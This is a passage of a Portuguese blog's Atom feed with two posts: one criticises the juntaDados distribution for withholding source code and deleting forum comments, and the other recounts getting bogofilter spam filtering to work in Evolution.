No dia 21/06/2010 saiu a nova versão 2.04 e novamente eles não falaram sobre o código fonte. Dessa vez, eu fiz um comentário no fórum. O Thadeu 'GNU' Cascardo aproveitou o comentário que fiz e argumentou um pouco mais. Após esse comentário a conversa desandou totalmente (ainda bem que fiz essa cópia de segurança). O pessoal do juntaDados editou e apagou vários comentários e logo em seguida fecharam os comentários. Mas o pior, foi apagar todo o histórico da conversa algum tempo depois. E para piorar de vez, recebo um email de alguém do juntaDados com cópia para o kov e o cascardo. Aqui esta o primeiro email do juntaDados; A resposta do kov; Outro email do juntaDados; A minha resposta ao primeiro email do juntaDados; A minha resposta ao segundo email do juntaDados.

Depois de toda essa confusão eu decidi publicar toda a história para documentar o que aconteceu, mas de lá pra cá aconteceram mil coisas e eu acabei me enrolando. Mas antes tarde do que nunca.

Eu sempre me surpreendo quando vejo pessoas que trabalham com Software Livre que não sabem receber críticas. Não quero ser Polícia batendo na porta das pessoas, mas custa fazer direito?!</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=50&amp;w=my_weblog"><![CDATA[
                No dia 24/05/2010 eu li sobre a <a href="http://www.juntadados.org/content/nova-revis%C3%A3o-da-distribui%C3%A7%C3%A3o-multim%C3%ADdia-juntadados-104r3" title="JuntaDados 104r3">nova revisão da distribuição multimídia juntaDados 1.04r3</a>. Achei interessante porque eu sabia que a <a href="http://blogs.metareciclagem.org/fabi/" title="Fabiana 'Goa'">Fabiana "Goa"</a> e o <a href="http://marcelo.cebacad.net/" title="Marcelo Souza">Marcelo Souza</a> estavam envolvidos, uma vez que trabalhei no <a href="http://cultura.gov.br">minC</a> e eles fazem parte de um dos <a href="http://wiki.juntadados.org/wikka.php?wakka=ProjetoPesquisa" title="Pontões de Cultura Digital">Pontões de Cultura Digital</a>. Lendo sobre a nova revisão do juntaDados reparei que não falava do código fonte, então comentei sobre isso na <a href="http://metaldot.alucinados.comxmpp:minaslivre@conference.jabber-br.org" title="sala XMPP">sala XMPP</a> da <a href="http://minaslivre.org" title="MinasLivre">MinasLivre</a>. O <a href="http://blog.kov.eti.br/" title="Gustavo 'kov' Noronha">Gustavo 'kov'  Noronha</a> entrou no fórum e fez um comentário perguntando sobre o código fonte. Ele recebeu uma resposta falando que era o mesmo código do <a href="http://ubuntu.com" title="Ubuntu">Ubuntu</a> e que se ele quisesse era só pegar os fontes nos mirrors do Ubuntu, porque eles não tinham infra-estrutura para manter o código fonte, que na minha opinião é uma desculpa boba, uma vez que eles podiam gerar um ISO com os fontes (a resposta publicada no dia foi editada e eu não tenho a original, mas tenho uma <a href="http://metaldot.alucinados.com/juntadados/nova-revis%C3%A3o-da-distribui%C3%A7%C3%A3o-multim%C3%ADdia-juntadados-104r3.html" title="cópia de segurança">cópia de segurança</a> do que esta publicado hoje).<br />
<br />
No dia 21/06/2010 saiu a <a href="http://www.juntadados.org/juntadados-2.04" title="JuntaDados 2.04">nova versão 2.04</a> e novamente eles não falaram sobre o código fonte. Dessa vez, eu fiz um comentário no fórum. O <a href="http://cascardo.info/" title="Thadeu 'GNU' Cascardo">Thadeu 'GNU' Cascardo</a> aproveitou o comentário que fiz e argumentou um pouco mais. Após esse comentário <a href="http://metaldot.alucinados.com/juntadados/juntadados-2.04.html" title="a conversa desandou totalmente">a conversa desandou totalmente</a> (ainda bem que fiz essa cópia de segurança). O pessoal do juntaDados <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00002.html" title="editou">editou</a> e <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00001.html" title="apagou">apagou</a> vários comentários e logo em seguida fecharam os comentários. Mas o pior, foi apagar todo o histórico da conversa algum tempo depois. E para piorar de vez, recebo um email de alguém do juntaDados com cópia para o kov e o cascardo. Aqui esta o <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00004.html" title="primeiro email do juntaDados">primeiro email do juntaDados</a>; A <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00005.html" title="resposta do kov">resposta do kov</a>; Outro <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00003.html" title="email do juntaDados">email do juntaDados</a>; A <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00006.html" title="minha resposta ao primeiro email">minha resposta ao primeiro email</a> do juntaDados; A <a href="http://metaldot.alucinados.com/juntadados/mbox/msg00007.html" title="minha resposta ao segundo email">minha resposta ao segundo email</a> do juntaDados.<br />
<br />
Depois de toda essa confusão eu decidi publicar toda a história para documentar o que aconteceu, mas de lá pra cá aconteceram mil coisas e eu acabei me enrolando. Mas antes tarde do que nunca.<br />
<br />
Eu sempre me surpreendo quando vejo pessoas que trabalham com Software Livre que não sabem receber críticas. Não quero ser Polícia batendo na porta das pessoas, mas custa fazer direito?!
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>evolution+bogofilter</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=49&amp;w=my_weblog" />
		<updated>2009-10-01T21:31:00-03:00</updated>
		<published>2009-09-30T20:34:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.49</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Estou a algumas semanas tentando fazer meu evolution filtrar emails "junk". Instalei o bogofilter, o spamassassin, habilitei os plugins no evolution e marquei todas as mensagens que eram junk (~300), torci pela primeira vez pra receber um spam , ele veio e não funcionou. Perguntei pro cascardo e também para ophractal se eles sabiam como habilitar. O phractal falou que no evolution dele funcionava perfeitamente. Verifiquei com ele e as configurações estavam iguais. Apaguei a minha wordlist (~/.bogofilter/wordlist.db) e marquei novamente os spams como "junk". Torci pela segunda vez pra receber um spam, ele veio e também não funcionou.

Hoje, lendo a blogada do Jack Wallen, descobri que eu estava treinando errado o meu filtro. É preciso marcar os emails que não são "junk" como "junk" e depois desmarcá-los. Fiz isso e torci pela terceira vez. O spam veio e foi direto pra minha pasta "junk", yeah!</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=49&amp;w=my_weblog"><![CDATA[
                Estou a algumas semanas tentando fazer meu <a href="http://projects.gnome.org/evolution" title="evolution">evolution</a> filtrar emails "junk". Instalei o <a href="http://bogofilter.sourceforge.net" title="bogofilter">bogofilter</a>, o <a href="http://spamassassin.apache.org" title="spamassassin">spamassassin</a>, habilitei os plugins no evolution e marquei todas as mensagens que eram junk (~300), torci pela primeira vez pra receber um <a href="http://pt.wikipedia.org/wiki/Spam" title="spam">spam</a> , ele veio e não funcionou. Perguntei pro <a href="http://cascardo.info/index.atom" title="cascardo">cascardo</a> e também para o<a href="http://svale.eng.br/" title="phractal">phractal</a> se eles sabiam como habilitar. O phractal falou que no evolution dele funcionava perfeitamente. Verifiquei com ele e as configurações estavam iguais. Apaguei a minha wordlist (~/.bogofilter/wordlist.db) e marquei novamente os spams como "junk". Torci pela segunda vez pra receber um spam, ele veio e também não funcionou.<br />
<br />
Hoje, lendo a blogada do <a href="http://www.ghacks.net/2009/06/20/use-bogofilter-for-better-junk-detection-in-evolution/" title="Jack Wallen">Jack Wallen</a>, descobri que eu estava treinando errado o meu filtro. É preciso marcar os emails que não são "junk" como "junk" e depois desmarcá-los. Fiz isso e torci pela terceira vez. O spam veio e foi direto pra minha pasta "junk", yeah!
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
</feed>
